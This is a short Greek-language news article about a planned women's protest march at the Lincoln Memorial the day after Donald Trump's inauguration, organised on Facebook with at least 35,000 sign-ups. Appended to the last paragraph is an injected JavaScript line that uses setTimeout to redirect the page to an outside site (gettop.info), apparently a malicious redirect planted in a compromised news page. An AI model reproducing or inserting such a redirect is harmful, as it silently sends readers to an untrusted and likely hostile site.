Γυναικεία δύναμη κατά του Τραμπ – Τον αναμένουν στην Ουάσινγκτον

0
21

 

Υπό τον φόβο ότι η εκλογή Τραμπ θα οδηγήσει σε καταπάτηση των δικαιωμάτων τους, οι γυναίκες ετοιμάζονται να υποδεχθούν τον Τραμπ στην Ουάσινγκτον με μαζική διαδήλωση.

Η συγκέντρωση διαμαρτυρίας θα γίνει μία ημέρα μετά την ορκωμοσία του Ντόναλντ Τραμπ στην Ουάσιγκτον, στο μνημείο του Λίνκολν.

Στο Facebook, όπου οργανώνεται η πορεία με τον τίτλο «Million Women March», τουλάχιστον 35.000 χρήστες δήλωσαν ότι θα συμμετάσχουν.

Η πορεία αυτή είναι η απάντηση στη συμπεριφορά που έχει επιδείξει ο Ντόναλντ Τραμπ απέναντι στις γυναίκες, όπως αποδείχθηκε κατά την διάρκεια της προεκλογικής εκστρατείας του απέναντι στην υποψήφια του Δημοκρατικού Κόμματος Χίλαρι Κλίντον, επεσήμανε η Μπλαντ, μία από τις διοργανώτριες στη Νέα Υόρκη.

Μεταξύ άλλων, ο δισεκατομμυριούχος προσέβαλε γυναίκες δημοσιογράφους, μια πολιτική του αντίπαλο και άλλες γυναίκες για την εξωτερική τους εμφάνιση, ενώ οι διοργανώτριες υπενθυμίζουν τα σεξιστικά σχόλια σε βίντεο που δημοσιεύτηκε πρόσφατα.

Η κινητοποίηση οργανώνεται από πολιτεία σε πολιτεία, ανέφερε η Φοντέιν Πίρσον, 54 ετών, μια συντονίστρια στο Μέμφις του Τενεσί. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here